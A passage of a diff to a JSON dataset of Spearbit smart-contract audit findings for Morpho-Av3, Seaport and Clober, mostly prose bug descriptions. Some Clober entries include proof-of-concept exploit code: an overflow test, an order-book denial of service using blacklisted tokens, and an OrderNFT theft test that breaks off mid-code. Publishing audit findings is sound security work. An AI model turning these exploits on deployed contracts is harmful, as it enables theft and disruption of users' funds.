fulfiller == zone, the check continues to be skipped.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: High Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "Collateral setters for Morpho / Aave can end up in a deadlock", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "One can end up in a deadlock where changing the Aave pool or Morpho collateral state is not possible anymore because it can happen that Aave automatically turns the collateral asset off (for example, when withdrawing everything / getting liquidated). Imagine a collateral asset is turned on for both protocols: setAssetIsCollateralOnPool(true) setAssetIsCollateral(true) Then, a user withdraws everything on Morpho / Aave, and Aave automatically turns it off. It's off on Aave but on on Morpho. It can't be turned on for Aave anymore because: if (market.isCollateral) revert Errors.AssetIsCollateralOnMorpho(); But it also can't be turned off on Morpho anymore because of: if (!_pool.getUserConfiguration(address(this)).isUsingAsCollateral(_pool.getReserveData(underlying).id) ) { revert Errors.AssetNotCollateralOnPool(); ,! ,! } c This will be bad if new users deposit after having withdrawn the entire asset. The asset is collateral on Morpho but not on Aave, breaking an important invariant that could lead to liquidating the Morpho Aave position.", + "title": "Clean up inline documentation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "The comments highlighted in Context need to be removed or updated. Remove the following: 73 ConsiderationEncoder.sol:216: // @todo Dedupe some of this ConsiderationEncoder.sol:316: // @todo Dedupe some of this ZoneInteraction.sol:97: // bytes memory callData; ZoneInteraction.sol:100: // function(bytes32) internal view errorHandler; ZoneInteraction.sol:182: // let magicValue := shr(224, mload(callData)) ConsiderationStructs.sol#L167 and ZoneInteraction.sol#L82 contain an outdated comment about the extraData attribute. There is no longer a staticcall being done, and the function isValidOrderIn- cludingExtraData no longer exists. The NatSpec comment for _assertRestrictedAdvancedOrderValidity mentions: /** * @dev Internal view function to determine whether an order is a restricted * * * * * order and, if so, to ensure that it was either submitted by the offerer or the zone for the order, or that the zone returns the expected magic value upon performing a staticcall to `isValidOrder` or `isValidOrderIncludingExtraData` depending on whether the order fulfillment specifies extra data or criteria resolvers. A few of the facts are not correct anymore: * This function is not a view function anymore and change the storage state either for a zone or a contract offerer. * It is not only for restricted orders but also applies to orders of CONTRACT order type. * It performs actuall calls and not staticcalls anymore. * it calls the isValidOrder endpoint of a zone or the ratifyOrder endpoint of a contract offerer depending on the order type. * If it is dealing with a restricted order, the check is only skipped if the msg.sender is the zone. Seaport is called by the offerer for a restricted order, the call to the zone is still performed. If Same comments apply to _assertRestrictedBasicOrderValidity excluding the case when order is of CONTRACT order type. Typos in TransferHelperErrors.sol - * @dev Revert with an error when a call to a ERC721 receiver reverts with + * @dev Revert with an error when a call to an ERC721 receiver reverts with The @ NatSpec fields have an extra space in Consideration.sol: * @ The extra space can be removed.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Medium Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "First reward claim is zero for newly listed reward tokens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "When Aave adds a new reward token for an asset, the reward index for this (asset, reward) pair starts at 0. When an update in Morpho's reward manager occurs, it initializes all rewards for the asset and would initialize this new reward token with a startingIndex of 0. 1. Time passes and emissions accumulate to all pool users, resulting in a new index assetIndex. Users who deposited on the pool through Morpho before this reward token was listed should receive their fair share of the entire emission rewards (assetIndex - 0) * oldBalance but they currently receive zero because getRewards returns early if the user's computed index is 0. 2. Also note that the external getUserAssetIndex(address user, address asset, address reward) can be inaccurate because it doesn't simulate setting the startingIndex for reward tokens that haven't been set yet. 3. A smaller issue that can happen when new reward tokens are added is that updates to the startingIndex are late, the startingIndex isn't initialized to 0 but to some asset index that accrued emissions for some time. Morpho on-pool users would lose some rewards until the first update to the asset. (They should accrue from index 0 but accrue from startingIndex.) Given frequent calls to the RewardManager that initializes all rewards for an asset, this difference should be negligible.", + "title": "Consider writing tests for hard coded constants in ConsiderationConstants.sol", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "There are many hard coded constants, most being function selectors, that should be tested against.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Medium Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "Disable creating markets for siloed assets", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "Aave-v3 introduced siloed-borrow assets and siloed-borrow mode for users \"This feature allow assets with potentially manipulatable oracles (for example illiquid Uni V3 pairs) to be listed on Aave as single borrow asset i.e. if user borrows siloed asset, they cannot borrow any other asset. This helps mitigating the risk associated with such assets from impacting the overall solvency of the protocol.\" - Aave Docs The Morpho contract should not be in siloed-borrowing mode to avoid its restrictions on borrowing any other listed assets, especially as borrowing on the pool might be required for withdrawals. If a market for the siloed asset is created at deployment, users might borrow the siloed asset and break borrowing any of the other assets.", + "title": "Unused / Redundant imports in ZoneInteraction.sol", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "There are multiple unused / redundant imports.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Medium Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "A high value of _defaultIterations could make the withdrawal and repay operations revert because of OOG", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "When the user executes some actions, he/she can specify their own maxIterations parameter. The user maxIterations parameter is directly used in supplyLogic and borrowLogic. In the withdrawLogic Morpho is recalculating the maxIterations to be used internally as Math.max(_default- Iterations.withdraw, maxIterations) and in repayLogic is directly using _defaultIterations.repay as the max number of iterations. This parameter is used as the maximum number of iterations that the matching engine can do to match suppli- ers/borrowers during promotion/demotion operations. 15 function _promoteOrDemote( LogarithmicBuckets.Buckets storage poolBuckets, LogarithmicBuckets.Buckets storage p2pBuckets, Types.MatchingEngineVars memory vars ) internal returns (uint256 processed, uint256 iterationsDone) { if (vars.maxIterations == 0) return (0, 0); uint256 remaining = vars.amount; // matching engine code... for (; iterationsDone < vars.maxIterations && remaining != 0; ++iterationsDone) { // matching engine code (onPool, inP2P, remaining) = vars.step(...); // matching engine code... } // matching engine code... } As you can see, the iteration keeps going on until the matching engine has matched enough balance or the iterations have reached the maximum number of iterations. If the matching engine cannot match enough balance, it could revert because of OOG if vars.maxIterations is a high value. For the supply or borrow operations, the user is responsible for the specified number of iterations that might be done during the matching process, in that case, if the operations revert because of OGG, it's not an issue per se. The problem arises for withdraw and replay operations where Morpho is forcing the number of operations and could make all those transactions always revert in case the matching engine does not match enough balance in time. Keep in mind that even if the transaction does not revert during the _promoteOrDemote logic, it could revert during the following operations just because the _promoteOrDemote has consumed enough gas to make the following operations to use the remaining gas.", + "title": "Orders of CONTRACT order type do not enforce a usage of a specific conduit", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "None of the endpoints (generateOrder and ratifyOrder) for an order of CONTRACT order type en- force using a specific conduit. A contract offerer can enforce the usage of a specific conduit or just Seaport by setting allowances or approval for specific tokens. If a caller calls into different Seaport endpoints and does not provide the correct conduit key, then the order would revert. Currently, the ContractOffererInterface interface does not have a specific endpoint to discover which conduits the contract offerer would prefer users to use. getMetadata() would be able to return a metadata that encodes the conduit key. For (advanced) orders of not CONTRACT order types, the offerer would sign the order and the conduit key is included in the signed hash. Thus, the conduit is enforced whenever that order gets included in a collection by an actor calling Seaport.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Medium Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "Morpho should check that the _positionsManager used has the same _E_MODE_CATEGORY_ID and _- ADDRESSES_PROVIDER values used by the Morpho contract itself", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "Because _E_MODE_CATEGORY_ID and _ADDRESSES_PROVIDER are immutable variables and because Morpho is calling the PositionsManager in a delegatecall context, it's fundamental that both Morpho and Posi- tionsManager have been initialized with the same _E_MODE_CATEGORY_ID and _ADDRESSES_PROVIDER values. Morpho should also check the value of the PositionsManager._E_MODE_CATEGORY_ID and PositionsManager._- ADDRESSES_PROVIDER in both the setPositionsManager and initialize function.", + "title": "Calls to Seaport that would fulfill or match a collection of advanced orders can be front-ran to claim any unused offer items", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "Calls to Seaport that would fulfill or match a collection of advanced orders can be front-ran to claim any unused offer items. These endpoints include: fulfillAvailableOrders fulfillAvailableAdvancedOrders matchOrders matchAdvancedOrders Anyone can monitor the mempool to find calls to the above endpoints and calculate if there are any unused offer item amounts. If there are unused offer item amounts, the actor can create orders with no offer items, but with consideration items mirroring the unused offer items and populate the fulfillment aggregation data to match the 84 unused offer items with the new mirrored consideration items. It is possible that the call by the actor would be successful under certain conditions. For example, if there are orders of CONTRACT order type involved, the contract offerer might reject this actor (the rejection might also happen by the zones used when validating the order). But in general, this strategy can be implemented by anyone.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Medium Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "In _authorizeLiquidate, when healthFactor is equal to Constants.DEFAULT_LIQUIDATION_THRESHOLD Morpho is wrongly setting close factor to DEFAULT_CLOSE_FACTOR", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "When the borrower's healthFactor is equal to Constants.MIN_LIQUIDATION_THRESHOLD Morpho is returning the wrong value for the closeFactor allowing only liquidate 50% of the collateral instead of the whole amount. When the healthFactor is lower or equal to the Constants.MIN_LIQUIDATION_THRESHOLD Morpho should return Constants.MAX_CLOSE_FACTOR following the same logic applied by Aave. Note that the user cannot be liquidated even if healthFactor == MIN_LIQUIDATION_THRESHOLD if the priceOr- acleSentinel is set and IPriceOracleSentinel(params.priceOracleSentinel).isLiquidationAllowed() == false. See how Aave performs the check inside validateLiquidationCall.", + "title": "Advance orders of CONTRACT order types can generate orders with more offer items and the extra offer items might not end up being used.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "When Seaport gets a collection of advanced orders to fulfill or match, if one of the orders has a CON- TRACT order type, Seaport calls the generateOrder(...) endpoint of that order's offerer. generateOrder(...) can provide extra offer items for this order. These extra offer items might have not been known beforehand by the caller. And if the caller would not incorporate the indexes for the extra items in the fulfillment aggregation data, the extra items would end up not being aggregated into any executions.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Medium Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "_authorizeBorrow does not check if the Aave price oracle sentinel allows the borrowing operation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "Inside the Aave validation logic for the borrow operation, there's an additional check that prevents the user from performing the operation if it has been not allowed inside the priceOracleSentinel require( params.priceOracleSentinel == address(0) || IPriceOracleSentinel(params.priceOracleSentinel).isBorrowAllowed(), Errors.PRICE_ORACLE_SENTINEL_CHECK_FAILED ); 17 Morpho should implement the same check. If for any reason the borrow operation has been disabled on Aave, it should also be disabled on Morpho itself. While the transaction would fail in case Morpho's user would need to perform the borrow on the pool, there could be cases where the user is completely matched in P2P. In those cases, the user would have performed a borrow even if the borrow operation was not allowed on the underlying Aave pool.", + "title": "Typo for the index check comment in _aggregateValidFulfillmentConsiderationItems", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "There is a typo in _aggregateValidFulfillmentConsiderationItems: // Retrieve item index using an offset of the fulfillment pointer. let itemIndex := mload( add(mload(fulfillmentHeadPtr), Fulfillment_itemIndex_offset) ) // Ensure that the order index is not out of range. <---------- the line with typo if iszero(lt(itemIndex, mload(considerationArrPtr))) { throwInvalidFulfillmentComponentData() } The itemIndex above refers to the index in consideration array and not the order.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Medium Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "_updateInDS does not \"bubble up\" the updated values of onPool and inP2P", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "The _updateInDS function takes as input uint256 onPool and uint256 inP2P that are passed not as reference, but as pure values. function _updateInDS( address poolToken, address user, LogarithmicBuckets.Buckets storage poolBuckets, LogarithmicBuckets.Buckets storage p2pBuckets, uint256 onPool, uint256 inP2P, bool demoting ) internal { if (onPool <= Constants.DUST_THRESHOLD) onPool = 0; if (inP2P <= Constants.DUST_THRESHOLD) inP2P = 0; // ... other logic of the function } Those values, if lower or equal to Constants.DUST_THRESHOLD will be set to 0. The issue is that the updated version of onPool and inP2P is never bubbled up to the original caller that will later use those values that could have been changed by the _updateInDS logic. For example, the _updateBorrowerInDS function call _updateInDS and relies on the value of onPool and inP2P to understand if the user should be removed or added to the list of borrowers. function _updateBorrowerInDS(address underlying, address user, uint256 onPool, uint256 inP2P, bool ,! demoting) internal { _updateInDS( _market[underlying].variableDebtToken, user, _marketBalances[underlying].poolBorrowers, _marketBalances[underlying].p2pBorrowers, onPool, inP2P, demoting ); if (onPool == 0 && inP2P == 0) _userBorrows[user].remove(underlying); else _userBorrows[user].add(underlying); } 18 Let's assume that inP2P and onPool passed as _updateBorrowerInDS inputs were equal to 1 (the value of DUST_- THRESHOLD). In this case, _updateInDS would update those values to zero because 1 <= DUST_THRESHOLD and would remove the user from both the poolBucket and p2pBuckets of the underlying. When then the function returns in the _updateBorrowerInDS context, the same user would not remove the under- lying from his/her _userBorrows list of assets because the updated values of onPool and inP2P have not been bubbled up by the _updateInDS function. The same conclusion could be made for all the \"root\" level codes that rely on the onPool and inP2P values that could not have been updated with the new 0 value set by _updateInDS.", + "title": "Document the unused parameters for orders of CONTRACT order type", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "If an advance order advancedOrder is of CONTRACT order type, certain parameters are not being used in the code base, specifically: numerator: only used for skipping certain operations (see AdvancedOrder.numerator and AdvancedOrder.denominator are unchecked for orders of CONTRACT order type) denominator: -- signature: -- parameters.zone: only used when emitting the OrderFulfilled event. parameters.offer.endAmount: endAmount and startAmount for offer items will be set to the amount sent back by generateOrder for the corresponding item. parameters.consideration.endAmount: endAmount and startAmount for consideration items will be set to the amount sent back by generateOrder for the corresponding item parameters.consideration.recipient: the offerer contract returns new recipients when generateOrder gets called parameters.zoneHash: -- parameters.salt: -- parameters.totalOriginalConsiderationItems: --", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Low Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "There is no guarantee that the _rewardsManager is set when calling claimRewards", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "Since the _rewardsManager address is set using a setter function in Morpho only and not in the MorphoStorage.sol constructor there is no guarantee that the _rewardsManager is not the default address(0) value. This could cause failures when calling claimRewards if Morpho forgets to set the _rewardsManager.", + "title": "The check against totalOriginalConsiderationItems is skipped for orders of CONTRACT order type", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "compares dOrder.parameters.consideration.length: The AdvancedOrder.parameters.totalOriginalConsiderationItems inequality following skipped orders for of is CONTRACT order with type which Advance- // Ensure supplied consideration array length is not less than the original. if (suppliedConsiderationItemTotal < originalConsiderationItemTotal) { _revertMissingOriginalConsiderationItems(); }", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Low Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "Its Impossible to set _isClaimRewardsPaused", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "The claimRewards function checks the isClaimRewardsPaused boolean value and reverts if it is true. Currently, there is no setter function in the code base that sets the _isClaimRewardsPaused boolean so it is impossible to change.", + "title": "getOrderStatus returns the default values for orderHash that is derived for orders of CONTRACT order type", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "Since the _orderStatus[orderHash] does not get set for orders of CONTRACT order type, getOrder- Status would always returns (false, false, 0, 0) for those hashes (unless there is a hash collision with other types of orders)", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Low Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "User rewards can be claimed to treasury by DAO", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "When a user claims rewards, the rewards for the entire Morpho contract position on Aave are claimed. The excess rewards remain in the Morpho contract for until all users claimed their rewards. These rewards are not tracked and can be withdrawn by the DAO through a claimToTreasury call.", + "title": "validate skips CONTRACT order types but cancel does not", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "When validating orders validate skips any order of CONTRACT order type, but cancel does not skip these order types. When fulfilling or matching orders for CONTRACT order types, _orderStatus does not get checked or populated. But in cancel the isValidated and the isCancelled fields get set. This is basically a no-op for these order types.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Low Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "decreaseDelta lib function should return early if amount == 0", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "The passed in amount should be checked for a zero value, and in that condition, return early from the function. The way it currently is unnecessarily consumes more gas, and emits change events that for values that don't end up changing (newScaledDelta). Checking for amount == 0 is already being done in the increaseDelta function.", + "title": "The literal 0x1c used as the starting offset of a custom error in a revert statement can be replaced by the named constant Error_selector_offset", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "In the context above, 0x1c is used to signal the start of a custom error block saved in the memory: revert(0x1c, _LENGTH_) For the above literal, we also have a named constant defined in ConsiderationConstants.sol#L410: uint256 constant Error_selector_offset = 0x1c; The named constant Error_selector_offset has been used in most places that a custom error is reverted in an assembly block.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Gas Optimization" + "Seaport", + "Severity: Informational" ] }, { - "title": "Smaller gas optimizations", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "There are several small expressions that can be further gas optimized.", + "title": "OrderBook Denial of Service leveraging blacklistable tokens like USDC", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The issue was spotted while analysing additional impact and fix for 67 Proof of concept checked with the original audit commit: 28062f477f571b38fe4f8455170bd11094a71862 and the newest available commit from dev branch: 2ed4370b5de9cec5c455f5485358db194f093b01 Due to the architecture decision which implements orders queue as a cyclic buffer the OrderBook after reaching MAX_ORDERS (~32k) for a given price point, starts to overwrite stale orders. If an order was never claimed or it is broken, so it cannot be claimed, it is not possible to place a new order in a queue. This emerges due to a fact that it is not possible to finalize the stale order and deliver the underlying assets, what is done while placing a new and replacing a stale order. Effectively this issue can be used to block the main functionality of the OrderBook, so placing new orders for a given price point. Only a single broken order per price-point is enough to lead to this condition. The issue will not be immediately visible as it requires the cyclic buffer to make a circle and encounter the broken order. The proof of concept in SecurityAuditTests.sol attachment implements a simple scenario where a USDC-like mock token is used: 1. Mallory creates one ASK order at some price point (to sell X base tokens for Y quoteTokens). 2. Mallory transfers ownership of the OrderNFT token to an address which is blacklisted by quoteToken (e.g. USDC) 3. Orders queue implemented as a circular buffer over time overflows and starts replacing old orders. 4. When it is the time to replace the order the quoteToken is about to be transferred, but due to the blacklist the assets cannot be delivered. 5. At this point it is impossible to place new orders at this price index, unless the owner of the OrderNFT transfers it to somebody who can receive quoteToken. Proof of concept result for the newest 2ed4370b5de9cec5c455f5485358db194f093b01 commit: # $ git clone ... && git checkout 2ed4370b5de9cec5c455f5485358db194f093b01 # $ forge test -m \"test_security_BlockOrderQueueWithBlacklistableToken\" [25766] MockOrderBook::limitOrder(0x0000000000000000000000000000000000004444, 3, 0, ,! 333333333333333334, 2, 0x) [8128] OrderNFT::onBurn(false, 3, 0) [1448] MockOrderBook::getOrder((false, 3, 0)) [staticcall] (1, 0, 0x00000000000000000000000000000000DeaDBeef) emit Approval(owner: 0x00000000000000000000000000000000DeaDBeef, approved: 0x0000000000000000000000000000000000000000, tokenId: 20705239040371691362304267586831076357353326916511159665487572671397888) emit Transfer(from: 0x00000000000000000000000000000000DeaDBeef, to: 0x0000000000000000000000000000000000000000, tokenId: 20705239040371691362304267586831076357353326916511159665487572671397888) () emit ClaimOrder(claimer: 0x0000000000000000000000000000000000004444, user: 0x00000000000000000000000000000000DeaDBeef, rawAmount: 1, bountyAmount: 0, orderIndex: 0, priceIndex: 3, isBase: false) [714] MockSimpleBlockableToken::transfer(0x00000000000000000000000000000000DeaDBeef, 10000) ,! ,! ,! ,! ,! ,! \"blocked\" \"blocked\" \"blocked\" 5 In real life all *-USDC and USDC-* pairs as well as other pairs where a single token implements a block list are affected. The issue is also appealing to the attacker as at any time if the attacker controls the blacklisted wallet address, he/she can transfer the unclaimable OrderNFT to a whitelisted address to claim his/her assets and to enable processing until the next broken order is placed in the cyclic buffer. It can be used either to manipulate the market by blocking certain types of orders per given price points or simply to blackmail the DAO to resume operations.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Gas Optimization" + "Clober", + "Severity: Critical Risk" ] }, { - "title": "Gas: Optimize LogarithmicBuckets.getMatch", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "The getMatch function of the logarithmic bucket first checks for a bucket that is the next higher bucket If no higher bucket is found it searches for a bucket that is the than the bucket the provided value would be in. highest bucket that \"is in both bucketsMask and lowerMask.\" However, we already know that any bucket we can now find will be in lowerMask as lowerMask is the mask corresponding to all buckets less than or equal to value's bucket. Instead, we can just directly look for the highest bucket in bucketsMask.", + "title": "Overflow in SegmentedSegmentTree464", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "SegmentedSegmentTree464.update needs to perform an overflow check in case the new value is greater than the old value. This overflow check is done when adding the new difference to each node in each layer (using addClean). Furthermore, there's a final overflow check by adding up all nodes in the first layer in total(core). However, in total, the nodes in individual groups are added using DirtyUint64.sumPackedUnsafe: function total(Core storage core) internal view returns (uint64) { return DirtyUint64.sumPackedUnsafe(core.layers[0][0], 0, _C) + DirtyUint64.sumPackedUnsafe(core.layers[0][1], 0, _C); } The nodes in a group can overflow without triggering an overflow & revert. The impact is that the order book depth and claim functionalities break for all users. 6 // SPDX-License-Identifier: BUSL-1.1 pragma solidity ^0.8.0; import \"forge-std/Test.sol\"; import \"forge-std/StdJson.sol\"; import \"../../contracts/mocks/SegmentedSegmentTree464Wrapper.sol\"; contract SegmentedSegmentTree464Test is Test { using stdJson for string; uint32 private constant _MAX_ORDER = 2**15; SegmentedSegmentTree464Wrapper testWrapper; function setUp() public { testWrapper = new SegmentedSegmentTree464Wrapper(); } function testTotalOverflow() public { uint64 half64 = type(uint64).max / 2 + 1; testWrapper.update(0, half64); // map to the right node of layer 0, group 0 testWrapper.update(_MAX_ORDER / 2 - 1, half64); assertEq(testWrapper.total(), 0); } }", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Gas Optimization" + "Clober", + "Severity: Critical Risk" ] }, { - "title": "Consider reverting the supplyCollateralLogic execution when amount.rayDivDown(poolSupplyIndex) is equal to zero", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "In Aave, when an AToken/VariableDebtToken is minted or burned, the transaction will revert if the amount divided by the index is equal to zero. You can see the check in the implementation of _mintScaled and _burnScaled functions in the Aave codebase. Morpho, with PR 688, has decided to prevent supply to the pool in this scenario to avoid a revert of the operation. Before the PR, if the user had supplied an amount for which amount.rayDivDown(poolSupplyIndex) would be equal to zero, the operation would have reverted at the Aave level during the mint operation of the AToken. With the PR, the operation will proceed because the supply to the Aave pool is skipped (see PoolLib.supplyToPool). Allowing this scenario in this specific context for the supplyCollateralLogic function will bring the following side effects: The supplied user's amount will remain in Morpho's contract and will not be supplied to the Aave pool. The user's accounting system is not updated because collateralBalance is increased by amount.rayDivDown(poolSupplyIndex) which is equal to zero. 21 If the marketBalances.collateral[onBehalf] was equal to zero (the user has never supplied the underly- ing to Morpho) the underlying token would be wrongly added to the _userCollaterals[onBehalf] storage, even if the amount supplied to Morpho (and to Aave) is equal to zero. The user will not be able to withdraw the provided amount because the amount has not been accounted for in the storage. Events.CollateralSupplied event is emitted even if the amount (used as an event parameter) has not been accounted to the user.", + "title": "OrderNFT theft due to controlling future and past tokens of same order index", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The order queue is implemented as a ring buffer, to get an order (Orderbook.getOrder) the index in the queue is computed as orderIndex % _MAX_ORDER. The owner of an OrderNFT also uses this function. function _getOrder(OrderKey calldata orderKey) internal view returns (Order storage) { return _getQueue(orderKey.isBid, orderKey.priceIndex).orders[orderKey.orderIndex & _MAX_ORDER_M]; } CloberOrderBook(market).getOrder(decodeId(tokenId)).owner Therefore, the current owner of the NFT of orderIndex also owns all NFTs with orderIndex + k * _MAX_ORDER. An attacker can set approvals of future token IDs to themself. These approvals are not cleared on OrderNFT.onMint when a victim mints this future token ID, allowing the attacker to steal the NFT and cancel the NFT to claim their tokens. 7 // SPDX-License-Identifier: BUSL-1.1 pragma solidity ^0.8.0; import \"forge-std/Test.sol\"; import \"../../../../contracts/interfaces/CloberMarketSwapCallbackReceiver.sol\"; import \"../../../../contracts/mocks/MockQuoteToken.sol\"; import \"../../../../contracts/mocks/MockBaseToken.sol\"; import \"../../../../contracts/mocks/MockOrderBook.sol\"; import \"../../../../contracts/markets/VolatileMarket.sol\"; import \"../../../../contracts/OrderNFT.sol\"; import \"../utils/MockingFactoryTest.sol\"; import \"./Constants.sol\"; contract ExploitsTest is Test, CloberMarketSwapCallbackReceiver, MockingFactoryTest { struct Return { address tokenIn; address tokenOut; uint256 amountIn; uint256 amountOut; uint256 refundBounty; } struct Vars { uint256 inputAmount; uint256 outputAmount; uint256 beforePayerQuoteBalance; uint256 beforePayerBaseBalance; uint256 beforeTakerQuoteBalance; uint256 beforeOrderBookEthBalance; } MockQuoteToken quoteToken; MockBaseToken baseToken; MockOrderBook orderBook; OrderNFT orderToken; function setUp() public { quoteToken = new MockQuoteToken(); baseToken = new MockBaseToken(); } function cloberMarketSwapCallback( address tokenIn, address tokenOut, uint256 amountIn, uint256 amountOut, bytes calldata data ) external payable { if (data.length != 0) { Return memory expectedReturn = abi.decode(data, (Return)); assertEq(tokenIn, expectedReturn.tokenIn, \"ERROR_TOKEN_IN\"); assertEq(tokenOut, expectedReturn.tokenOut, \"ERROR_TOKEN_OUT\"); assertEq(amountIn, expectedReturn.amountIn, \"ERROR_AMOUNT_IN\"); assertEq(amountOut, expectedReturn.amountOut, \"ERROR_AMOUNT_OUT\"); assertEq(msg.value, expectedReturn.refundBounty, \"ERROR_REFUND_BOUNTY\"); } IERC20(tokenIn).transfer(msg.sender, amountIn); } 8 function _createOrderBook(int24 makerFee, uint24 takerFee) private { orderToken = new OrderNFT(); orderBook = new MockOrderBook( address(orderToken), address(quoteToken), address(baseToken), 1, 10**4, makerFee, takerFee, address(this) ); orderToken.init(\"\", \"\", address(orderBook), address(this)); uint256 _quotePrecision = 10**quoteToken.decimals(); quoteToken.mint(address(this), 1000000000 * _quotePrecision); quoteToken.approve(address(orderBook), type(uint256).max); uint256 _basePrecision = 10**baseToken.decimals(); baseToken.mint(address(this), 1000000000 * _basePrecision); baseToken.approve(address(orderBook), type(uint256).max); } function _buildLimitOrderOptions(bool isBid, bool postOnly) private pure returns (uint8) { return (isBid ? 1 : 0) + (postOnly ? 2 : 0); } uint256 private constant _MAX_ORDER = 2**15; // 32768 uint256 private constant _MAX_ORDER_M = 2**15 - 1; // % 32768 function testExploit2() public { _createOrderBook(0, 0); address attacker = address(0x1337); address attacker2 = address(0x1338); address victim = address(0xbabe); // Step 1. Attacker creates an ASK limit order and receives NFT uint16 priceIndex = 100; uint256 orderIndex = orderBook.limitOrder{value: Constants.CLAIM_BOUNTY * 1 gwei}({ user: attacker, priceIndex: priceIndex, rawAmount: 0, baseAmount: 1e18, options: _buildLimitOrderOptions(Constants.ASK, Constants.POST_ONLY), data: new bytes(0) }); // Step 2. Given the `OrderKey` which represents the created limit order, an attacker can craft ,! ambiguous tokenIds CloberOrderBook.OrderKey memory orderKey = CloberOrderBook.OrderKey({isBid: false, priceIndex: priceIndex, orderIndex: orderIndex}); uint256 currentTokenId = orderToken.encodeId(orderKey); orderKey.orderIndex += _MAX_ORDER; uint256 futureTokenId = orderToken.encodeId(orderKey); // Step 3. Attacker approves the futureTokenId to themself, and cancels the current id vm.startPrank(attacker); orderToken.approve(attacker2, futureTokenId); CloberOrderBook.OrderKey[] memory orderKeys = new CloberOrderBook.OrderKey[](1); orderKeys[0] = orderKey; orderKeys[0].orderIndex = orderIndex; // restore original orderIndex 9 orderBook.cancel(attacker, orderKeys); vm.stopPrank(); // Step 4. attacker fills queue, victim creates their order recycles orderIndex 0 uint256 victimOrderSize = 1e18; for(uint256 i = 0; i < _MAX_ORDER; i++) { orderBook.limitOrder{value: Constants.CLAIM_BOUNTY * 1 gwei}({ 